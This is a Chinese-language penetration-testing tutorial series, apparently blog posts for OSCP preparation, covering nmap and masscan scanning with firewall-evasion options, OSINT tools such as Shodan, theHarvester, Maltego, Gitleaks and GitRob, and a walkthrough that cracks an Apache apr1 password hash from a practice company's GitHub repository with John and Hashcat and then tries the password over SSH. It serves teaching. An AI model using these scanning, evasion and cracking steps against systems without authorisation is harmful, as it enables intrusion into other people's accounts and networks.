- 原理：不扫描端口，仅检测目标是否在线（使用 ARP/ICMP/TCP 等协议探测）。
sudo nmap 38.100.193.70 -O
- 作用：操作系统指纹识别。
- 原理：通过 TCP/IP 协议栈行为（如 TTL 值、窗口大小）推测目标操作系统。
sudo nmap 38.100.193.70 -sV -A
- 作用：全面扫描组合。
  - -sV：服务版本探测。
  - -A：启用 OS 识别、版本探测、脚本扫描和路由跟踪。
- 输出：开放端口、服务版本、操作系统、可能漏洞。
sudo nmap 38.100.193.70 --script=smb-os-discovery
- 作用：使用 NSE 脚本 smb-os-discovery 获取 Windows/Samba 系统的操作系统信息。
- 用途：识别 SMB 服务的主机名、系统版本等。
sudo nmap 38.100.193.70 --script=dns-zone-transfer
- 作用：使用 NSE 脚本 dns-zone-transfer 尝试 DNS 域传送。
- 用途：检测 DNS 服务器配置错误（泄露所有域名记录）。

Nmap 常用技巧

保存输出：

nmap -oN report.txt -oX report.xml 38.100.193.70 # 文本/XML 格式
nmap -oG - 38.100.193.70 | grep "open" # 提取开放端口

对比扫描结果：

ndiff scan1.xml scan2.xml # 检测目标变化

搜索 NSE 脚本：

ls /usr/share/nmap/scripts/*http* # 查找 HTTP 相关脚本
nmap --script-help=http-vuln* # 查看脚本帮助

实用技巧

# 1. 将扫描结果导入Metasploit
cat top-port-sweep.txt | awk '/Up/{print $2}' > hosts.txt
msfconsole -qx "db_import hosts.txt; services"

# 2. 生成拓扑图（需Nmap编译图形支持）
nmap -sn --traceroute --packet-trace 38.100.193.0/24 -oX netmap.xml
xsltproc netmap.xml -o topology.html

Masscan快速网络扫描

为扫描整个互联网而设计，六分钟扫描整个互联网，每秒发送一千万个包，masscan实现了自定义的tcp/ip栈堆需要使用sudo权限。

sudo apt install masscan 
sudo masscan -p80 192.168.1.0/8 
sudo macscan -p80 192.168.1.0/24 --rate=1000 -e tap0 --router -ip 192.168.1.1

命令解析

1. `sudo masscan -p80 192.168.1.0/8`

作用：对超大型网络进行快速端口扫描
关键参数：
- -p80：只扫描80端口（HTTP服务）
- 192.168.1.0/8：扫描整个B类私有网络（192.0.0.0 - 192.255.255.255），包含 1677万台主机
执行流程：
1. 不进行主机发现，直接扫描目标端口

通过SYN扫描发送TCP SYN包到目标80端口
收到SYN/ACK响应则标记为开放

风险：
- 扫描范围过大可能导致网络拥塞
可能触发大规模安全告警

2. `sudo masscan -p80 192.168.1.0/24 --rate=1000 -e tap0 --router-ip 192.168.1.1`

作用：对特定子网进行精确控制的扫描
修正：应为masscan（非macscan）
关键参数：
- -p80：扫描80端口
- 192.168.1.0/24：扫描C类子网（254个主机）
- --rate=1000：限速1000包/秒
- -e tap0：使用特定虚拟网络接口
- --router-ip 192.168.1.1：指定网关IP用于ARP解析
执行流程：
1. 向网关192.168.1.1发送ARP请求

获取目标主机MAC地址
通过tap0接口发送定制SYN包
严格按1000包/秒速率扫描

Masscan 核心优势

特性	Masscan	Nmap
扫描速度	100万包/秒	数千包/秒
大型网络处理	内置分片处理	需要手动分割
资源消耗	低内存占用	较高内存占用
扫描精度	端口状态检测	完整协议栈交互
隐蔽性	无状态扫描	有状态检测

Masscan 实用用法示例

1. 基础扫描

# 扫描单个IP的TOP100端口
sudo masscan 203.0.113.1 -p0-65535 --top-ports 100

# 扫描网段的多端口（HTTP/HTTPS）
sudo masscan 192.168.1.0/24 -p80,443,8000-8100

2. 精准速率控制

# 限制扫描速率（避免触发防火墙）
sudo masscan 10.0.0.0/16 -p22 --rate=500 # 500包/秒

# 随机化扫描顺序
sudo masscan 192.168.0.0/24 -p80 --randomize-hosts

3. 大型网络扫描优化

# 分布式扫描（多文件分片）
sudo masscan 172.16.0.0/12 -p443 --shard 1/10 # 第1/10片段
sudo masscan 172.16.0.0/12 -p443 --shard 2/10 # 第2/10片段

# 保存/恢复扫描进度
sudo masscan -p80 10.0.0.0/8 -oJ scan.json --resume paused.conf

4. 结果输出与处理

# XML格式输出（兼容Nmap工具）
sudo masscan 192.168.1.0/24 -p1-100 -oX scan.xml

# 提取开放端口IP
sudo masscan -p443 203.0.113.0/24 -oG - | grep 'open' | awk '{print $4}'

# 生成可视化报告
masscan -p80 192.168.1.0/24 -oX scan.xml
nmap-parse-output scan.xml html > report.html

5. 绕过防火墙技巧

# 伪装源端口（使用53端口发送）
sudo masscan -p80 203.0.113.0/24 --source-port 53

# 使用代理链扫描
proxychains masscan -p443 198.51.100.0/24

# 分片数据包
sudo masscan -p22 192.168.1.0/24 --mtu 512

使用场景对比

场景	推荐命令
快速资产发现	`masscan -p80,443 10.0.0.0/8 --rate=10000`
精确服务扫描	`nmap -sV -O 192.168.1.1-100`
超大型网络端口普查	`masscan 203.0.113.0/24 --shard 1/50`
内网隐蔽扫描	`nmap -T2 -sS -Pn --scan-delay 500ms`

注意事项

法律合规：扫描前必须获得明确授权
带宽控制：使用--rate参数避免网络瘫痪
结果验证：Masscan结果需用Nmap二次验证
持久扫描：大型网络使用--resume保存进度
更新数据库：定期apt update && apt upgrade masscan获取最新指纹库

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day17 Kali开源信息收集

Fri, 30 May 2025 14:54:26 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

上一篇文章中，我们用google语法搜索了Github上的该公司的员工信息

1site:github.com "megacorpone.com"

找到网页 https://github.com/megacorpone

找到文件megacorpone/xampp.users 发现疑似密码字段

1trivera:$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0

密码破解与爆破

🔍 一、哈希结构分析

加密字符串格式为： trivera:$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0

$apr1$ ：标识 Apache 特定的 MD5 算法变种（加盐迭代）
A0vSKwao：8字符盐值（Salt）
GV3sgGAj...：实际哈希值

⚙️ 二、Kali 破解方法

方法 1：John the Ripper（推荐）

步骤：

创建哈希文件hash.txt，内容为：

1trivera:$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0

启动破解（自动识别apr1格式）：

1john --format=md5crypt-long hash.txt
2# 或显式指定格式
3john --format=apr1 hash.txt

使用字典加速（如 Kali 内置rockyou.txt）：

1john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

查看结果：

1john --show hash.txt
2# 输出示例：trivera:password123

爆破得到密码trivera:Tanya4life可能是ssh登录的。

方法 2：Hashcat（GPU 加速）

提取哈希部分（移除用户名和盐标识）：

1echo '$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0' > hash.txt

启动破解（-m 1600对应apr1模式）：

1hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

查看结果：
```
1hashcat --show -m 1600 hash.txt
```

⚡ 三、性能优化技巧

字典选择：
- 优先使用rockyou.txt（需解压）：
```
1sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
```
- 自定义字典：结合目标信息生成（如公司名、日期等）

规则扩展：在 Hashcat 中使用规则增强字典覆盖：

1hashcat -m 1600 -a 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

暴力破解（最后手段）：

1# 尝试 6-8 位小写字母+数字
2hashcat -m 1600 -a 3 hash.txt ?l?l?l?l?l?l?d?d --increment

⚠️ 四、注意事项

合法性：仅限破解自有或授权数据！
成功率：
- 简单密码（如password123）可能在几分钟内破解
- 复杂密码（12位+特殊字符）需数天甚至不可行
算法特性：
- apr1基于 MD5，但迭代 1000 次增加破解难度
- 盐值（A0vSKwao）防止彩虹表攻击

💡 提示：若以上方法失败，可尝试组合工具（如先用 John 初步筛选，再用 Hashcat GPU 深度破解）。

📚 附：相关命令速查

操作	John the Ripper	Hashcat
基础破解	`john hash.txt`	`hashcat -m 1600 hash.txt dict`
指定字典	`john --wordlist=dict.txt hash.txt`	`hashcat -a 0 hash.txt dict`
显示结果	`john --show hash.txt`	`hashcat --show -m 1600 hash.txt`

建议优先使用 John the Ripper 进行快速尝试，复杂场景切换 Hashcat + GPU 加速。

Gitleaks和GitRob使用方法

一、GitLeaks：敏感信息检测工具

核心功能

扫描 Git 仓库中的硬编码密码、API 密钥、令牌等敏感信息，支持本地仓库、远程仓库及 CI/CD 集成。

安装方法

Kali安装
```
1sudo apt install gitleaks
```

Docker 部署：

1# 拉取镜像
2docker pull ghcr.io/gitleaks/gitleaks:latest
3# 扫描本地目录（将 /path/to/code 替换为代码路径）
4docker run -v /path/to/code:/scan_dir ghcr.io/gitleaks/gitleaks detect --source "/scan_dir"

Homebrew：

1brew install gitleaks
2gitleaks detect --source .

GitHub Action 集成：在 CI 流程中添加以下步骤：

1- name: GitLeaks Scan
2 uses: gitleaks/gitleaks-action@v2
3 env:
4 GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

关键命令

功能	命令
扫描目录	`gitleaks detect --source /path/to/dir`
生成 JSON 报告	`gitleaks detect --report-path report.json`
自定义规则文件	`gitleaks detect --config gitleaks.toml`

 1Gitleaks scans code, past or present, for secrets
 2
 3Usage:
 4 gitleaks [command]
 5
 6Available Commands:
 7 completion Generate the autocompletion script for the specified shell
 8 detect detect secrets in code
 9 help Help about any command
10 protect protect secrets in code
11 version display gitleaks version
12
13Flags:
14 -b, --baseline-path string path to baseline with issues that can be ignored
15 -c, --config string config file path
16 order of precedence:
17 1. --config/-c
18 2. env var GITLEAKS_CONFIG
19 3. (--source/-s)/.gitleaks.toml
20 If none of the three options are used, then gitleaks will use the default config
21 --exit-code int exit code when leaks have been encountered (default 1)
22 -h, --help help for gitleaks
23 -l, --log-level string log level (trace, debug, info, warn, error, fatal) (default "info")
24 --max-target-megabytes int files larger than this will be skipped
25 --no-banner suppress banner
26 --redact redact secrets from logs and stdout
27 -f, --report-format string output format (json, csv, sarif) (default "json")
28 -r, --report-path string report file
29 -s, --source string path to source (default: $PWD) (default ".")
30 -v, --verbose show verbose output from scan
31
32Use "gitleaks [command] --help" for more information about a command.

以下是 Gitleaks 帮助文档的完整翻译及整理结果，附带常用示例用法：

Gitleaks 文档翻译

功能：扫描代码（历史或当前）中的敏感密钥（如 API Key、密码等） 命令格式：

gitleaks [command]

可用命令（Available Commands）

命令	说明
`completion`	为指定 shell 生成自动补全脚本（如 bash/zsh）
`detect`	核心功能：检测代码中的敏感密钥
`help`	查看命令帮助
`protect`	在提交时实时拦截密钥（通常用于 Git Hook）
`version`	显示 Gitleaks 版本

全局参数（Flags）

参数	说明
`-b, --baseline-path <路径>`	指定基准文件路径（忽略已记录的漏洞）
`-c, --config <路径>`	配置文件路径（优先级顺序：1. 本参数 > 2. 环境变量 `GITLEAKS_CONFIG` > 3. 代码目录下的 `.gitleaks.toml` > 4. 默认配置）
`--exit-code <整数>`	检测到密钥时的退出码（默认值 `1`，常用于 CI/CD 流程）
`-h, --help`	显示帮助信息
`-l, --log-level <级别>`	日志级别（trace/debug/info/warn/error/fatal，默认 `info`）
`--max-target-megabytes <MB>`	跳过超过指定大小的文件（单位：MB）
`--no-banner`	关闭横幅提示
`--redact`	安全：在输出中隐藏密钥内容（替换为 `***`）
`-f, --report-format <格式>`	报告格式（json/csv/sarif，默认 `json`）
`-r, --report-path <路径>`	报告输出路径
`-s, --source <路径>`	扫描的代码目录（默认：当前目录 `.`）
`-v, --verbose`	显示详细扫描日志

使用 gitleaks [command] --help 查看具体命令帮助（如 gitleaks detect --help）

典型用法示例

1. 基础扫描（当前目录）

gitleaks detect

扫描当前目录所有文件（包括 Git 历史记录）
检测到密钥时程序退出码为 1（可通过 $? 判断结果）

2. 扫描指定目录 + 生成报告

gitleaks detect \
 --source ~/projects/myapp \ # 指定目录
 --report-format json \ # 报告格式
 --report-path leaks.json # 输出文件

3. 安全扫描（隐藏密钥内容）

gitleaks detect --redact -v

输出日志中的密钥将被替换为 ***
-v 显示详细扫描过程

4. 与 CI/CD 集成（GitLab 示例）

stages:
 - security

gitleaks_scan:
 stage: security
 image: zricethezav/gitleaks:latest
 script:
 - gitleaks detect --exit-code 1

在 CI 流水线中检测到密钥立即失败（exit-code 1）

5. 使用自定义配置

gitleaks detect \
 --config custom.toml \ # 自定义规则文件
 --baseline-path baseline.json # 忽略已知问题

custom.toml：定义特定密钥规则（如公司内部密钥格式）
baseline.json：忽略历史已处理的漏洞

注意事项

敏感操作：
- 使用 --redact 避免密钥在日志中泄露。
性能优化：
- 用 --max-target-megabytes 10 跳过大型文件（如二进制文件）。
Git 集成：
- protect 命令可配置为 pre-commit 钩子（实时拦截提交中的密钥）。
配置优先级：
- 灵活使用 -c 参数覆盖默认规则，避免漏报。

通过 gitleaks detect --help 查看所有参数说明，或访问官方文档获取完整配置示例。

使用 GitLeaks 扫描 GitHub 仓库的完整步骤

1. 克隆目标仓库

git clone --depth 1 https://github.com/megacorpone/megacorpone.com.git
cd megacorpone.com.git

2. 执行 GitLeaks 扫描

gitleaks detect -v --redact

detect：扫描模式
-v：详细输出（显示所有检测结果）
--redact：自动屏蔽敏感信息（防止二次泄露）

3. 生成报告（可选）

gitleaks detect --report-format json --report-path leaks_report.json

生成 JSON 格式报告，便于后续分析
其他格式支持：csv, sarif, html

高级用法

1. 仅扫描最新提交

gitleaks detect --log-opts -1

2. 指定扫描范围

# 扫描最近 10 个提交
gitleaks detect --log-opts -10

# 扫描特定分支
gitleaks detect --branch develop

3. 自定义规则

创建规则文件 custom.toml：

title = "Custom Rules"

[[rules]]
description = "MegaCorp API Key Detector"
regex = '''(?:mc)(?:[0-9a-z\-_\t .]{0,20})(?:[0-9a-f]{32})'''
tags = ["key", "megacorp"]

使用自定义规则扫描：
```
gitleaks detect --config custom.toml
```

4. Docker 方式扫描（无需克隆）

docker run -v $(pwd):/path ghcr.io/gitleaks/gitleaks:latest detect \
 --source https://github.com/megacorpone/megacorpone.com.git \
 --report-format json \
 --report-path /path/leaks.json

结果解读示例

Finding: AWS Access Key
Secret: AKIAIOSFODNN7EXAMPLE
RuleID: aws-access-token
File: src/config.py:15
Commit: d0d1c3c4d5b6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
Author: dev@megacorpone.com
Date: 2025-01-15T08:00:00Z

高危项：AWS密钥、数据库凭证、API密钥
中危项：内部邮箱、服务器地址
低危项：测试凭据、占位符

注意事项

法律合规：
- 仅扫描授权仓库
- 避免公开泄露扫描结果

误报处理：

使用 --baseline-path 忽略已知误报

gitleaks detect --baseline-path previous_report.json

性能优化：
- 大仓库添加 --max-target-megabytes=50 限制文件大小
- 使用 --no-git 跳过Git历史扫描（仅当前文件）
敏感信息保护：
- 始终使用 --redact 或 --exit-code（CI/CD场景）
```
gitleaks detect --exit-code 1 # 发现泄露时返回非0状态码
```

扫描完成后，立即检查并修复所有发现的敏感信息泄露！

🕵️ 二、GitRob：GitHub 仓库敏感文件扫描

核心功能

自动化扫描 GitHub 用户/组织的公开仓库，检测配置文件、密钥文件等高危文件（如 .env、id_rsa）。

安装与使用

安装（需 Go 环境）：

1sudo apt install golang-go
2go get github.com/michenriksen/gitrob

启动扫描：

1# 使用 GitHub Token 扫描目标用户（替换 <token> 和 <username>）
2gitrob -t <github_token> <username>

注：Token 需在 GitHub Settings → Developer Settings 生成，权限勾选 repo 和 user。

输出解读

结果按文件类型分类（如 Database、SSH Keys）。
显示文件路径、仓库 URL 及风险等级。

⚖️ 三、工具对比与联合使用建议

特性	GitLeaks	GitRob
扫描目标	代码内容（敏感字符串）	仓库文件结构（高危文件名）
适用场景	本地/远程仓库深度内容检测	GitHub 公开仓库快速筛查
输出形式	JSON/命令行报告	命令行表格
联合策略	先用 GitRob 定位可疑仓库，再用 GitLeaks 深度扫描

⚠️ 四、注意事项

法律合规：仅扫描授权目标，禁止未授权探测他人仓库。
误报处理：GitLeaks 支持自定义规则（修改 gitleaks.toml过滤误报）。
性能优化：大仓库扫描可能超时，建议通过--max-target-megabytes限制文件大小。

💎 五、实战流程示例

graph LR
A[GitRob 扫描目标用户仓库] --> B{发现高危文件}
B -->|存在 .env 等| C[GitLeaks 深度扫描该仓库]
B -->|无风险| D[结束]
C --> E[生成泄露报告]

Shodan网络空间搜索引擎

Shodan 是一个专注于物联网设备和网络服务的搜索引擎，可用于安全研究、漏洞发现和资产监控。以下是详细的使用方法：

一、网页端使用（Shodan.io）

注册账户
- 访问 Shodan官网，网址：https://www.shodan.io/dashboard 注册免费账户（免费账户功能有限，付费账户支持高级搜索）。
基础搜索命令
- 关键词搜索：直接输入设备类型（如 webcam）、服务（如 ftp）或厂商（如 cisco）。
- 过滤器（组合使用更精准）：
  - port:：指定端口（例：port:22）
  - country:：国家代码（例：country:CN）
  - city:：城市（例：city:beijing）
  - org:：组织/运营商（例：org:"China Telecom"）
  - os:：操作系统（例：os:"Windows Server"）
  - vuln:：CVE漏洞（例：vuln:CVE-2024-1234）
- 组合示例：
```
apache country:US port:80 
```

用如下命令搜索该网站的22端口，因为我们刚刚破解了一个疑似是ssh登录的密码trivera:Tanya4life

1hostname:megacorpone.com port:"22"

找到4个结果，最终测试发现149.56.244.87可以登录ssh，但是密码似乎不对。

高级功能
- 地图视图：搜索结果以地理分布展示。
- 漏洞筛选：点击 “Exploits” 标签查看相关漏洞。
- 资产监控（付费功能）：监控特定IP或网络的安全状态。

二、Kali Linux 命令行工具（`shodan`）

安装与配置

安装工具：

sudo apt update && sudo apt install -y shodan # Kali官方源安装

或使用Python pip：

pip install shodan

初始化API密钥：
- 登录 Shodan 官网，在个人资料中获取 API Key。
- 在终端配置：
```
shodan init YOUR_API_KEY
```

常用命令

命令	功能	示例
`shodan count <query>`	统计匹配结果数量	`shodan count apache`
`shodan search <query>`	搜索并显示结果（默认20条）	`shodan search "nginx country:CN"`
`shodan download <文件名> <query>`	下载原始数据（JSON格式）	`shodan download results "port:21"`
`shodan parse <文件名>`	解析下载的数据	`shodan parse results.json.gz`
`shodan host <IP>`	查询指定IP的详细信息	`shodan host 8.8.8.8`
`shodan scan list`	列出主动扫描任务（需付费）	`shodan scan list`

实用示例

搜索暴露的 Redis 服务：
```
shodan search "product:redis"
```
统计中国区暴露的 SSH 服务：
```
shodan count "port:22 country:CN"
```

下载所有暴露的 MongoDB 数据并解析：

shodan download mongo_data "port:27017"
shodan parse mongo_data.json.gz

优化显示

1 shodan parse --fields "ip_str,port,org" megacorpone.json.gz 
2 shodan parse --fields "ip_str,port,org,hostnames,domains,isp,product,version,os,location.country_name,location.city,location.latitude,location.longitude" megacorpone.json.gz 
3 shodan parse --fields "ip_str,port" --separator "," > megacorpone.csv

Shodan 的 --fields 参数支持丰富的字段选项，这些字段对应 Shodan 扫描结果中的 JSON 属性。以下是常用字段分类及示例：

核心字段

字段	说明
`ip_str`	IP 地址 (字符串格式)
`port`	端口号
`org`	组织/ISP (如 “Google LLC”)
`hostnames`	关联的主机名列表
`domains`	关联的域名列表
`asn`	自治系统号 (如 “AS15169”)
`isp`	网络服务提供商
`transport`	协议类型 (tcp/udp)
`product`	检测到的产品 (如 “nginx”)
`version`	产品版本
`os`	操作系统信息

地理位置字段

字段	说明
`location.country_code`	国家代码 (如 “US”)
`location.country_name`	国家全名 (如 “United States”)
`location.city`	城市名
`location.region_code`	地区/州代码 (如 “CA”)
`location.postal_code`	邮政编码
`location.latitude`	纬度
`location.longitude`	经度

HTTP 服务字段

字段	说明
`http.title`	网页标题
`http.server`	HTTP 服务器头
`http.headers`	完整 HTTP 头信息
`http.robots`	robots.txt 内容
`http.sitemap`	站点地图链接
`http.security.txt`	security.txt 内容

SSL/TLS 证书字段

字段	说明
`ssl.cert.subject`	证书主题
`ssl.cert.issuer`	证书颁发机构
`ssl.cert.expired`	是否过期 (true/false)
`ssl.cert.validity.start`	证书有效期开始
`ssl.cert.validity.end`	证书有效期结束
`ssl.cipher.version`	SSL/TLS 版本
`ssl.jarm`	JARM 指纹

漏洞与安全字段

字段	说明
`vulns`	漏洞列表 (CVE IDs)
`opts.vulns`	漏洞详情 (需企业权限)
`cpe`	CPE 标识符列表
`shodan.ptr`	PTR 记录

特殊字段

字段	说明
`banner`	原始 banner 信息
`data`	完整响应数据
`timestamp`	扫描时间戳 (ISO 格式)
`_shodan.id`	Shodan 扫描 ID
`_shodan.module`	使用的扫描模块

使用技巧

嵌套字段访问：使用点号访问嵌套属性

shodan parse --fields "ip_str,port,location.country_code" data.json.gz

查看所有字段：提取一条完整记录检查可用字段
```
shodan parse data.json.gz | head -n 1
```

组合关键字段：常用组合示例

# IP + 端口 + 国家 + 组织 + 产品
shodan parse --fields "ip_str,port,location.country_code,org,product" data.json.gz

💡 提示：字段可用性取决于扫描类型和服务类型（HTTP/SSH/FTP 等）。使用 shodan host <IP> 命令可查看某 IP 的完整字段结构。

Security Headers Scanner 安全标题扫描器

网址：https://securityheaders.com/

SSL Server SSL服务测试

网址：https://www.ssllabs.com/ssltest/analyze.html

https://www.ssllabs.com/ssltest/

Pastebin存储和共享文本的网站。

网址：https://pastebin.com/

stack overflow国外代码问答网站

网址：https://stackoverflow.com/questions

theharvester 用户信息收集

theHarvester 是一款强大的开源情报（OSINT）收集工具，用于从公开来源挖掘目标信息（如域名、邮箱、IP、子域名等）。以下是其核心用法详解：

基础语法

theHarvester -d <domain> [选项]

-d / --domain：目标域名（必需参数）示例：theHarvester -d example.com

核心功能选项

1. 指定数据源（关键选项）

-b, --source <数据源> # 指定搜索源（默认：baidu,bing,duckduckgo,google）

常用数据源：

google：Google 搜索
bing：Bing 搜索
linkedin：LinkedIn 员工信息
twitter：Twitter 相关账号
shodan：Shodan IP/服务扫描
dnsdumpster：DNS 子域名挖掘
certspotter：SSL 证书信息
github：GitHub 代码泄露
完整列表：all（使用全部可用源）

示例：

# 使用 Google 和 DNSdumpster 搜索
theHarvester -d example.com -b google,dnsdumpster

# 使用全部数据源
theHarvester -d example.com -b all

2. 限制结果数量

-l, --limit <数量> # 限制每个数据源返回结果数（默认：500）

示例：theHarvester -d example.com -l 100

3. 主动扫描扩展

-s, --scrape # 抓取网站提取额外邮箱（可能触发反爬）
-v, --virtual-host # 验证虚拟主机（检查IP是否托管多域名）
-n, --dns-lookup # 对发现的域名执行DNS解析
-c, --shodan # 使用Shodan API扫描发现的IP（需API密钥）

示例：

theHarvester -d example.com -b all -s -n -c

4. 输出控制

-f, --filename <文件> # 结果保存到文件（默认：results/<domain>.html/.xml）
--filename # 仅控制文件名前缀（自动追加格式后缀）

示例：

# 保存为JSON格式
theHarvester -d example.com -f results.json -b google

高级用法

1. 代理配置（绕过封锁）

--proxy # 使用代理（需在配置文件中设置代理服务器）

配置文件路径：/etc/theHarvester/proxies.yaml

2. API密钥配置

部分数据源（如Shodan、GitHub）需API密钥：

编辑配置文件：/etc/theHarvester/api-keys.yaml

添加密钥（示例）：

shodan: YOUR_SHODAN_API_KEY
github: YOUR_GITHUB_TOKEN

3. 组合实战示例

目标：全面收集企业信息并验证服务

theHarvester -d example.com \
 -b google,dnsdumpster,linkedin,shodan \ # 指定核心数据源
 -l 200 \ # 限制结果量
 -s -n -v -c \ # 启用主动验证
 -f full_report # 输出到文件

输出结果解读

工具输出包含以下关键信息：

Hosts (IP地址)：发现的服务器IP
Emails：关联邮箱（含来源）
Subdomains：子域名列表
Virtual Hosts：共享IP的域名
Shodan Data：开放端口/服务详情（需-c）
关联人员（LinkedIn/Twitter来源）

注意事项

法律合规：仅用于授权测试，避免滥用
速率限制：搜索引擎会封禁高频请求，建议：
- 限制结果数（-l 100）
- 使用代理（--proxy）
- 避免频繁执行
API密钥：Shodan/GitHub等源需配置密钥才能生效

💡 提示：使用 theHarvester -h 查看完整帮助文档，获取最新数据源列表和选项说明。

练习题

使用TheHarvester枚举megacorpone.com的电子邮件地址。

1theHarvester -d megacorpone.com -b bing
2emailharvester -d megacorpone.com
3proxychains emailharvester -d megacorpone.com # 带代理查找

网址：https://www.social-searcher.com/

基于特定网站的搜索工具

Twiter https://digi.ninja/projects/twofi.php

LinkedIn https://github.com/initstring/linkedin2username

可以自行再github上搜索相关工具。

OSINT Framework 开源情报框架

网址：https://osintframework.com/

介绍了一些国外常用的收集信息的工具和网站，基于该框架搜索和收集信息

Maltego

网址：http://www.paterva.com/buy/maltego-clients.php

安装后免费注册一个账号即可使用

Maltego 是一款强大的开源情报（OSINT）和网络关系可视化工具，用于信息收集、关联分析和数据取证。以下是详细使用指南：

一、核心概念

实体（Entities）
- 基本数据单元（如 Domain, IP, Person, Email, Phone 等）
- 右键可执行操作（Transforms）
变换（Transforms）
- 对实体执行的操作（如查找关联域名、邮箱、IP等）
图谱（Graph）
- 可视化展示实体间的关系网络

二、基础工作流程

步骤1：创建新项目

启动 Maltego → New → Graph
命名项目（如 megacorp_investigation）

步骤2：添加起始实体

左侧面板选择实体类型（如 Domain）
拖拽到工作区 → 双击输入目标（如 megacorpone.com）
```
graph LR
A[Domain: megacorpone.com] --> B[Run Transforms]
```

步骤3：执行变换（Transforms）

右键实体 →
```
Run Transform
```
→ 选择模块
- 常用变换：
  - To DNS from domain（解析DNS记录）
  - To Website from Domain（查找网站）
  - To Email addresses（挖掘邮箱）
  - To IP addresses（解析IP）

步骤4：扩展分析

对新生成的实体重复步骤3

示例路径：

Domain → IP → Netblock → Other domains
 ↓
 Email → Person → Social profiles

三、实战案例：调查公司资产

目标：挖掘 megacorpone.com 相关资产和人员

起始点：添加 Domain 实体 → megacorpone.com

执行变换：

graph TB
A[Domain] --> B[To DNS names]
A --> C[To IP addresses]
A --> D[To Email addresses]
B --> E[Subdomains]
C --> F[Server IPs]
D --> G[Employee emails]

深度挖掘：
- 对IP运行 To Netblock → 发现同网段其他服务器
- 对邮箱运行 To Person → 关联LinkedIn资料
- 对人员运行 To Social Networks → 发现社交媒体账号

四、高级技巧

1. 自定义变换组合

创建
```
Machines
```
（自动化工作流）：
- Machines → Create new Machine
- 拖拽实体和变换构建流程
- 示例：自动完成 Domain → IP → Port Scan → Services

2. 数据源集成

安装Transform Hub模块：
- Shodan（IP扫描）
- Hunter.io（邮箱挖掘）
- VirusTotal（威胁情报）
配置API密钥：Transforms → Transform Hub → 激活服务

3. 可视化优化

颜色标记：右键实体 → Change Color（如红色标记高危IP）
关系线调整：拖动连线调整路径
布局优化：Layout → Organic / Hierarchical

4. 数据导出

导出图谱：Export → PNG/PDF/SVG
导出数据：Export → CSV/GraphML
生成报告：Reporting → Create Report

五、常用变换模块

变换名称	功能	适用实体
`To DNS from domain`	解析子域名	Domain
`To IP Address [DNS]`	解析IP地址	Domain
`To Website [Domain]`	发现关联网站	Domain
`To Email addresses [Domain]`	挖掘邮箱	Domain
`To Netblock [IP]`	查找IP所属网段	IP
`To Domain [SSL Cert]`	通过SSL证书发现域名	IP
`To Person [Email]`	关联人员信息	Email
`Shodan: Scan IP`	端口扫描	IP

六、最佳实践

分层调查：

graph LR
L1[基础设施] --> DNS/IP/Netblock
L2[人员] --> Email/Person/Social
L3[威胁] --> Vulnerabilities/Breach

保存检查点：File → Save as Snapshot
使用书签：标记关键实体（右键 → Bookmark）
避免噪音：设置过滤器（View → Filter Entities）

七、学习资源

官方教程：Help → Interactive Tutorials
案例库：Maltego Use Cases
认证课程：Maltego Certified Examiner (MCE)

⚠️ 注意：

遵守法律和道德规范，仅用于授权测试

社区版功能有限，企业版支持更多数据源

敏感操作（如端口扫描）可能触发安全警报

通过 Maltego 的可视化关联分析，您能将碎片信息转化为可行动的情报，极大提升渗透测试和威胁调查效率。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day16 Kali被动信息收集（开源情报）

Thu, 29 May 2025 17:45:02 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

被动信息收集（Passive Information Gathering）与主动信息收集（Active Information Gathering）的区别

在网络安全、渗透测试和威胁情报分析中，这两种信息收集方式的核心区别在于 是否直接与目标系统交互。

1. 被动信息收集

定义：通过公开资源或第三方数据源获取目标信息，不直接与目标系统或网络通信。
特点：
- 隐蔽性高：目标无法感知被探测。
- 依赖公开数据：利用搜索引擎、社交媒体、DNS记录、数据库等。
- 法律风险低：通常不违反法律（需遵守隐私政策）。
常见方法：
- 搜索引擎：Google Hacking（site:, filetype: 等语法）。
- WHOIS查询：获取域名注册信息（注册人、DNS服务器）。
- DNS解析：通过公开DNS记录获取子域名、IP地址（如 dig、nslookup）。
- 历史数据：查看网页快照（Wayback Machine）、漏洞数据库（CVE、Exploit-DB）。
- 社交媒体：LinkedIn、GitHub（员工信息、代码泄露）。
- Shodan/Censys：搜索暴露的物联网设备和服务。
适用场景：
- 渗透测试初期，确定目标范围。
- 威胁情报分析，追踪攻击者基础设施。
- 避免触发目标安全告警（如IDS/IPS）。

2. 主动信息收集

定义： 直接与目标系统或网络通信，通过发送探测请求获取信息。
特点：
- 交互性强：可能触发安全机制（如防火墙、日志记录）。
- 信息更精准：直接验证目标状态（端口开放性、服务版本）。
- 法律风险高：未经授权的主动探测可能违法（如《计算机欺诈与滥用法》）。
常见方法：
- 端口扫描：Nmap（-sS 半开扫描）、Masscan。
- 服务指纹识别：Banner抓取（Telnet、Netcat）、Nmap脚本（-sV）。
- 漏洞探测：Nessus、OpenVAS（验证已知漏洞）。
